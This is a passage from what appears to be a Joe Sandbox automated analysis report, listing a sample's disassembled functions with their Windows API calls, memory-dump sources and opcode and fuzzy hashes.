                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2218362B0864182EB04DF26E88416DB7A0FB89FD0B0D4635DE5ED7755DE7DD881C740
                                                                                                                                                                                                                    Function 00007FF656CE1F44 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2067211477-0
                                                                                                                                                                                                                    • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                                                                                                                                                    • Instruction ID: 7cdc7f058d75a64c1178d325a97ea2a8f1a2446f47485bf0f5d1194ae0565139
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3216F65A0978386EE16DFA5D412179B3B0AF84BD0F0C4930EE4EA7B95DF3EE854C640
                                                                                                                                                                                                                    Function 00007FF656CEF9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                    • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                                                                                                                                                    • Instruction ID: 02d3e74c1f76842c4695da133a54f5acc83f5e049b01b4ee91388896d4139072
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4411A3E6E9C60305F7672129E44337911717F543B0F2D8234EA7EEA7DA8E1EAC40C100
                                                                                                                                                                                                                    Function 00007FF656CD5244 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2117695475-0
                                                                                                                                                                                                                    • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                                                                                                                                                                    • Instruction ID: fca299233228ffcff589cd09df08247d4a654df0601d0a635b150842df11664c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2119AC0E8819349FB1977F198572B822B14F84345F8C4579EA4DFA2C3ED1FA845C662
                                                                                                                                                                                                                    Function 00007FF656D1CB58 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                    • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                                                                                                                                                                    • Instruction ID: f67b4bd4943887848bbd2f12750e5d383c76232455f8afbee1bc6e1f7c9c125b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5118836A04B81C6E710CF42E840169B7A5FB88FC4B194A36DF89A3B54EF7DE855C740
                                                                                                                                                                                                                    Function 00007FF656D1CAB4 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                    • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                                                                                                                                                                    • Instruction ID: d7c79c35b4848e2df344fd69b838b52577a8a8785dc6eeee87850a545ec40484
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB113636604B81C6E7108F12E840559B7B4FB88BD0B594A35DF8893B54DF7DE455C740
                                                                                                                                                                                                                    Function 00007FF656D1B748 Relevance: 7.5, APIs: 5, Instructions: 43stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                                                                                    • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                                                                                                                                                    • Instruction ID: 05bc5455cd36b34bf04eb2d56405b1022d2f71f5848cfcd524e21bbebaad0a0a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18112A26A08B8286EB009B26E40032A72A4EF85BC0F1C4735DE4D97658CF7ED881C700
                                                                                                                                                                                                                    Function 00007FF656D22ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                                                                                    • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                                                                                                                                                    • Instruction ID: 78d063209018e3cc3a860acd767acc6183469320e910046d95a5530ac549b3df
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF119622A0894281EB659F25E85477A3360FF88B84F4C8731DA4EA7298DF7ED5C9C700
                                                                                                                                                                                                                    Function 00007FF656D2D7F8 Relevance: 7.5, APIs: 5, Instructions: 36sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                                                                                    • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                                                                                                                                                    • Instruction ID: e353a4896a341460ff8f74d3c9c6db6823a1a497aff58c2de66ac9338d6be397
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B018F21A18A4282EB158B35E895139E361AF9A7C4B5C5B36E20FF2561DF2EE4D5C700
                                                                                                                                                                                                                    Function 00007FF656D30008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D3003C
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D30047
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D30055
                                                                                                                                                                                                                    • ~SyncLockT.VCCORLIB ref: 00007FF656D3005E
                                                                                                                                                                                                                      • Part of subcall function 00007FF656D2F7B8: CloseHandle.KERNEL32(?,?,?,00007FF656D30063,?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D2F7C9
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00007FF656D129AD,?,?,?,00007FF656CC2AB2), ref: 00007FF656D3006A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3142591903-0
                                                                                                                                                                                                                    • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                                                                                                                                                    • Instruction ID: 04725d9378581152bd37357ab90cb2176c36af4a902d65a8033ad7230ef65d60
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B01083AA18B4186E7509F15E4402297360FB88B90F184A35DB8E93B65CF3EE896C740
                                                                                                                                                                                                                    Function 00007FF656CE1DA0 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1611280651-0
                                                                                                                                                                                                                    • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                                                                                                                                    • Instruction ID: 27de03f7315122028eccf63ab5eef5cbdd058c8c0c29abb4a472465577cf5658
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8014F21B08A4392EA165B20D54517C3271FF40BB5F585B35D63EA6AD5DF3EEDA8C300
                                                                                                                                                                                                                    Function 00007FF656CB22E8 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                                                                                                    • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                                                                                                                                                    • Instruction ID: 778dcaafb169864029dfc57df82c53e74cdb0bb93203b9694619548573447246
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39017C71D0C68282FB659B11E9843383765BF09B98F5C4B30C81EE62A0CF7FA184C301
                                                                                                                                                                                                                    Function 00007FF656D2B5D4 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 179993514-0
                                                                                                                                                                                                                    • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                                                                                                                                                    • Instruction ID: e357b413be9354bfe5b375fefa6580b7555f9c5b0bff5004b6f24becc80ac8ab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F06514F1861282FB541772AC8867523517F4C785F8C5F30C90BE7251DD7F94D5C680
                                                                                                                                                                                                                    Function 00007FF656D203F8 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 179993514-0
                                                                                                                                                                                                                    • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                                                                                                                                    • Instruction ID: 0bed9644f62b428a83de77a41c590fff07d34dffdb2e8f8ff0e7407165038d21
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47F0C914F1861682FB641BB6A84967923526F9C781F8C9B30CD0BA2252DD2FA4EAC640
                                                                                                                                                                                                                    Function 00007FF656D36D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                    • API String ID: 948891078-24824748
                                                                                                                                                                                                                    • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                                                                                                                                                                    • Instruction ID: 40c4879774a4ca78f571571c4912609d4696c4fd7d754171bd7bc804a8f84d70
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
